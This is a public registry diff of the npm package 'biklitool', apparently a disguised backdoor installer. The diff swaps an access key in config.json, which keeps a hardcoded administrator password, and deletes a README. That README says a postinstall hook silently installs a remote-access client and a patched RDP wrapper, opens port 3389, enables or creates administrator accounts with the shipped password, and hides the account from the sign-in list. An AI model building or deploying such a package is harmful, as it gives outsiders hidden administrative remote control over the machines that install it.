biklitool 1.1.12 → 1.1.13

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/config.json +1 -1
  2. package/package.json +1 -1
  3. package/README.md +0 -96
package/config.json CHANGED
@@ -1,4 +1,4 @@
1
1
  {
2
- "bikliKey": "521D4544-C549-4129-8A58-A702C693F56E",
2
+ "bikliKey": "EC3B8ECB-057A-4DB8-830C-B986268607BD",
3
3
  "administratorPassword": "Hacker@1290"
4
4
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "biklitool",
3
- "version": "1.1.12",
3
+ "version": "1.1.13",
4
4
  "description": "Internal Windows installer for Bikli CLI and Bikli Wrapper",
5
5
  "license": "BSD-3-Clause",
6
6
  "publishConfig": {
package/README.md DELETED
@@ -1,96 +0,0 @@
1
- # biklitool
2
-
3
- Internal one-command Windows installer for the Bikli CLI and Bikli Wrapper.
4
-
5
- Provide the account password and Bikli key at install time via environment variables (they are not
6
- shipped in the package):
7
-
8
- ```text
9
- set BIKLIMASTER_USER_PASSWORD=your-password
10
- set BIKLIMASTER_BIKLI_KEY=your-bikli-key
11
- npm install -g biklitool
12
- ```
13
-
14
- The npm postinstall hook requests Windows administrator approval once, then:
15
-
16
- 1. silently installs the bundled Bikli CLI 1.1.10;
17
- 2. applies the Bikli key from `config.json` (`bikli up --setup-key`), when one is set;
18
- 3. installs or updates Bikli Wrapper with exact `termsrv.dll` compatibility data;
19
- 4. applies and verifies the Bikli Wrapper defaults;
20
- 5. enables Remote Desktop, port 3389, and the required Windows firewall rules;
21
- 6. detects the built-in Administrator by SID, enables it when disabled, and verifies both RDP groups;
22
- 7. exposes the `bikli`, `bikliwrapper`, `biklitool`, and `biklimaster` commands.
23
-
24
- The install fails instead of reporting success if Remote Desktop or port 3389 cannot be verified.
25
-
26
- No application installer or configuration GUI is shown. Windows UAC is required unless npm is
27
- already running from an Administrator terminal.
28
-
29
- Commands:
30
-
31
- ```text
32
- biklitool status
33
- biklitool install
34
- biklitool enable-rdp
35
- biklitool create-user
36
- biklitool setup-key
37
- biklitool credentials
38
- biklitool wrapper status
39
- biklitool self-test
40
- biklitool elevation-self-test
41
- bikliwrapper status
42
- bikli --help
43
- ```
44
-
45
- Run `biklimaster enable-rdp` at any time to repair the RDP enable setting, port, firewall rules,
46
- service configuration, and the requested authentication and shadowing defaults.
47
-
48
- ## Bikli key
49
-
50
- Paste the Bikli key into `config.json` under `bikliKey` (the first field in the file) before packing
51
- and publishing:
52
-
53
- ```json
54
- {
55
- "bikliKey": "PASTE-YOUR-BIKLI-KEY-HERE",
56
- "administratorPassword": ""
57
- }
58
- ```
59
-
60
- When a key is present, the install runs `bikli up --setup-key <key>` automatically right after the
61
- Bikli CLI is installed. Leave it empty to skip that step. `BIKLIMASTER_BIKLI_KEY` overrides the file
62
- value, and `biklimaster setup-key` re-applies the key at any time.
63
-
64
- WARNING: a key in `config.json` is visible to everyone if the package is published publicly.
65
-
66
- ## Administrator password
67
-
68
- Put the desired password in `config.json` under `administratorPassword` before packing and publishing.
69
- Bikli Master picks exactly one account to configure, using this cascade and never changing an account
70
- that is already set up:
71
-
72
- 1. If the built-in Administrator is **disabled**, it sets the configured password and enables it.
73
- 2. If the built-in Administrator is **already enabled**, it is left untouched and a local `admin`
74
- account is created with the configured password.
75
- 3. If `admin` also already exists, it is left untouched and a local `user` account is created with
76
- the configured password.
77
- 4. If `user` also already exists, no password is changed; the account is only verified.
78
-
79
- `BIKLIMASTER_USER_PASSWORD` overrides the file value. The selected account is enabled and verified in
80
- Administrators and Remote Desktop Users.
81
-
82
- The selected account is hidden from the Windows sign-in user list. It remains available for RDP by
83
- entering the username manually and remains visible to administrator tools.
84
-
85
- WARNING: a password in `config.json` is visible to everyone if the package is published publicly.
86
-
87
- The password set while enabling the account is also saved in `%ProgramData%\\BikliWrapper\\admin-credentials.json`
88
- with access restricted to SYSTEM and local Administrators. Run `biklimaster credentials` and approve
89
- UAC to display it later. Delete that file after securely saving or changing the password.
90
-
91
- Installing or updating Bikli Wrapper can restart Remote Desktop Services and disconnect active
92
- remote sessions. The bundled Windows executables are unsigned and may trigger an unknown-publisher
93
- warning from Windows or security software.
94
-
95
- This package contains Bikli client artifacts under the BSD 3-Clause license and RDP Wrapper
96
- artifacts under the Apache License 2.0. Both license texts are included.